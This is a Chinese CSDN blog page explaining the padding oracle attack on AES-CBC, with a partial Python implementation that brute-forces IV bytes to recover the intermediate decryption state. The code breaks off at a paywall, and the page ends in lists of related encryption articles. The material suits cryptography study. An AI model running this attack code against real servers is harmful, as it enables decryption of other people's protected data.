oracle实现aes解密_AES CBC模式下的Padding Oracle解密

最新推荐文章于 2024-07-08 07:38:39 发布
最新推荐文章于 2024-07-08 07:38:39 发布
阅读量653 收藏 1
点赞数 1
文章标签: oracle实现aes解密
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40005542/article/details/111553856
版权

当服务器处理CBC解密时,对于失败和成功返回不同的结果,就能进行Padding Oracle Attack。类似于布尔型SQL注入,针对每个分组的每个字节,输入正确的padding值(相当于明文),修改这个分组的iv,测试并找到返回成功的结果,与padding值XOR就能获得中间状态值(即图中的I2)。

padding oracle实现代码:

#coding=utf-8

#python 3

#padding oracle 实现代码

from Crypto import Random

#分组最大字节数

BS = 16

def pad(s):

return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)

def unpad(s):

return s[0:-s[-1]]

def find_valid_byte(req_fn, find_valid_fn, data, pos, min_req):

'''找到解密数据指定位置的正确IV字节值

req_fn 请求解密的函数

find_valid_fn 找到正确值的函数,参数为测试值和req_fn返回结果组成的map,如{1 : 'resp data'},

返回结果为正确的值,没有则需要返回None

data 要解密的数据

pos 要查找正确值的位置

min_req 最小测试次数,请求达到min_req次,就会比较是否找到正确的padding值'''

data = bytearray(data)

results = {}

for i in range(0x100):

#检测从0到255的值是否符合padding要求

data[pos] = i

results[i] = req_fn(bytes(data))

if i >= min_req:

r_data = find_valid_fn(results)

if r_data:

return r_data

return find_valid_fn(results)

def format_padding_iv(iv, pos, value):

'''格式化padding对应的iv

pos 指定开始位置

value 要测试的padding值

'''

r = bytearray(iv)

for idx, val in enumerate(r):

if idx > pos:

r[idx] = val ^ value

else:

r[idx] = val

return bytes(r)

def padding_oracle_group(req_fn, find_valid_fn, data, orig_iv, i_state=b'', min_req=256):

''' 获取一组数据的解密结果和intermiedate state

req_fn 请求解密的函数

find_valid_fn 找到正确值的函数,参数为测试值和req_fn返回结果组成的map,如{1 : 'resp data'},

返回结果为正确的值,没有则需要返回None

data 要解密的数据, bytes

orig_iv 要解密数据的iv, bytes

i_state 如果指定i_state,则会从没找到的位置继续

'''

count = BS - len(i_state)

iv = bytearray(Random.new().read(count) + i_state)

r_istate = bytearray(i_state)

for pos in reversed(range(count

最低0.47元/天 解锁文章
weixin_40005542
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
c Oracle通用aes加密,ORACLE 字段AES算法加密、解密
weixin_28850145的博客
04-03 302
ORACLE 字段AES算法加密、解密(解决中文乱码问题)2014年02月12日 17:13:37 华智互联 阅读数:97971.加解密函数入口CREATE OR REPLACE FUNCTION F_ZNMH_SMK_CRYPT(P_SRC IN VARCHAR2,P_TYPE IN NUMBER)RETURN VARCHAR2 ISRESULT VARCHAR2(4000);BEGIN/***...
Oracle实现Md5/Base64/Aes+Base64/UrlEncode+UrlDecode等加解密编码的使用备忘
Zhaof_Notes
06-14 2954
Oracle实现Md5/Base64/Aes+Base64/UrlEncode等加密编码的使用备忘
OEACLE怎么实现AES加密解密
最新发布
codedadi的博客
07-08 407
该函数接受多个参数,包括源数据(src)、加密算法类型(typ,例如AES-128、AES-192、AES-256等)、密钥(key)、以及(对于需要IV的模式)初始化向量(iv)。由于DBMS_CRYPTO包处理的是RAW类型的数据,因此你可能需要使用UTL_I18N.STRING_TO_RAW函数将字符串转换为RAW类型。该函数同样接受多个参数,包括密文(src)、加密算法类型(typ)、密钥(key),以及(对于需要IV的模式)初始化向量(iv)。-- 将解密后的RAW类型数据转换为字符串。
AES CBC模式下的Padding Oracle解密
weixin_30405421的博客
06-18 1037
AES CBC模式下的Padding Oracle解密 pre.src {background-color: #292b2e; color: #b2b2b2;} pre.src {background-color: #292b2e; color: #b2b2b2;} pre.src {background-color: #292b2e; color: #b...
.net byte转java byte_Java实现AES ECP PKCS5Padding解密工具类
weixin_39738251的博客
11-23 107
Java 实现一个AES/ECB/PKCS5Padding解密算法工具类加密算法:AES模式ECB补码方式:PKCS5Padding1. 工具类importlombok.Getter;importlombok.Setter;importlombok.extern.slf4j.Slf4j;importorg.springframework.util.Base64Utils;import...
python 实现AES加密解密(对称加密、ECB模式,配合base64)
西门大盗 捉虫专家
07-27 1万+
什么是对称加密 什么叫对称加密呢,你可以这么理解,一方通过密钥将信息加 密后,把密文传给另一方,另一方通过这个相同的密钥将密文 解密,转换成可以理解的明文 什么是非对称加密 1. A要向B发送信息,A和B都要产生一对用于加密和解密的公钥和私钥。 • 2. A的私钥保密,A的公钥告诉B;B的私钥保密,B的公钥告诉A。 • 3. A要给B发送信息时,A用B的公钥加密信息,因为A知道B的公钥。 •...
微信退款AES解密
08-09
3. 初始化 Cipher 对象,指定解密模式(如ECBCBC等)和填充方式(如PKCS5Padding)。 4. 调用Cipher的`init()`方法,传入解密模式和密钥。 5. 使用Cipher的`doFinal()`方法对加密数据进行解密操作。 6. 解析解密后...
更好地进行AES加密/解密
04-07
在实际应用中,还需要考虑其他因素,如密钥管理、加密模式ECBCBC、CFB等)、填充方式(PKCS7、Zero Padding等)以及完整性校验(如HMAC)。无论使用哪种语言,遵循安全最佳实践,如使用随机密钥,正确处理密钥和...
Java版AES加密算法,亲测可用
08-29
这里的`"AES/ECB/PKCS5Padding"`是加密模式,包括算法(AES)、工作模式ECB,Electronic Codebook)和填充方式(PKCS5Padding)。ECB是最基础的模式,不涉及密钥扩散,可能不适合大量数据的加密。对于更安全的选择...
AES加密异常处理
09-18
AES加密可以配合不同的工作模式(如ECBCBC、CFB等)和填充方式(如PKCS5Padding、NoPadding等)。选择合适的模式和填充方式可以提高加密的安全性和灵活性。 6. **注意事项** - 使用AES时,确保密钥安全存储,...
OATP-AES-Interoperable:Oracle ATP AES256-CBC与其他软件之间的互操作性
05-23
OATP-AES可互操作 Oracle自治事务处理数据库(Oracle ATP)AES256-CBC与其他数据库之间的互操作性 动机 现代软件系统之间的互操作性对于客户而言尤其重要。 借助我的Always Free Oracle ATP中的Oracle RESTful数据服务(ORDS)技术,我还可以测试数据项的专用点对点加密,即从相应的前端项到ATP DB后端项。 为此的第一个前提条件是验证OracleATP AES256-CBC与其他系统之间使用的数据加密的互操作性: Web浏览器密码API AES256-CBC 歌朗AES256-CBC Java AES256-CBC Python AES256-CBC
AES加密支持使用192、256位密匙
11-19
这些文件可以从Oracle官方网站下载,替换掉JRE的`jre/lib/security`目录下的相应策略文件。一旦替换完成,Java程序就可以处理更大的密钥长度。 在提供的压缩包文件"AES加密扩展"中,可能包含了上述的Java源代码示例...
ORACLE 字段AES算法加密、解密(解决中文乱码问题)
制心入境
11-06 1043
1.加解密函数入口 CREATE OR REPLACE FUNCTION F_ZNMH_SMK_CRYPT(P_SRC IN VARCHAR2, P_TYPE IN NUMBER) RETURN VARCHAR2 IS RESULT VARCHAR2(4000); BEGIN /************************************************* 信息加密函数 F_ZNMH_SMK_CRYPT  入...
AES 加密128/256(ecb\cbc)
qq_36538512的博客
03-13 2584
package com.wmeimob.bszf.util;import java.io.UnsupportedEncodingException;import java.security.InvalidAlgorithmParameterException;import java.security.InvalidKeyException;import java.security.NoSuchAl...
Oracle10.2.0.1 数据加密处理
从零开始的生活是充实的!
03-10 2171
     这是我csdn的第一编博客,希望能给有需要的人一些帮助      我要介绍的是oracle10g的数据加密处理,也就是通常的密码的加密处理,     要用到DECRYPT方法对数据解密和ENCRYPT方法加密     1.首先通过sys用户登录到oracle数据库,因为我们要通过这个用户来设置一些高级权限      grant execute on DBMS_crypto
Oracle aes128和aes256加解密
weixin_37704074的博客
07-15 1347
aes128加密 DECLARE l_src_data VARCHAR2(20) := 'Source Data'; l_type pls_integer := dbms_crypto.encrypt_aes128 + dbms_crypto.pad_pkcs5 + dbms_crypto.chain_cbc; l_key VARCHAR2(16) := '0123456789123456'; l_encval raw(2000); BEGIN l_encval :
Oracle加密解密
wang_chaodong的专栏
08-13 7212
本文使用Oracle内置Package加密解密方法,Oracle从10gR2版本开始支持这个包,利用这个函数可以对字段进行加解密,本包内置了多种加密解密方式(详见说明1),可以多个加密方式并行组合使用,也可独立使用,本次主要讲解RC4加密解密。 在密码学中,RC4(来自Rivest Cipher 4的缩写)是一种流加密算法,密钥长度可变。它加密解密使用相同的密钥,因此也属于对称加密算法。RC4是有线等效加密(WEP)中采用的加密算法,也曾经是TLS可采用的算法之一。 ...
AES CBC 加密解密(偏移量)
热门推荐
T的专栏
07-17 1万+
参考文章:AES加密解密ECB模式) 使用固定的key package com.eshore.cloud.utils; import android.text.TextUtils; import android.util.Base64; import java.security.Provider; import java.security.SecureRandom; import javax.crypto.Cipher; import javax.crypto.KeyGenerator; im
oracle实现aes解密
06-02
Oracle提供了DBMS_CRYPTO包来实现AES解密。 以下是一个简单的示例: 1. 创建测试表格 ``` CREATE TABLE test_table (id NUMBER, data CLOB); ``` 2. 插入测试数据 ``` INSERT INTO test_table VALUES (1, '...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值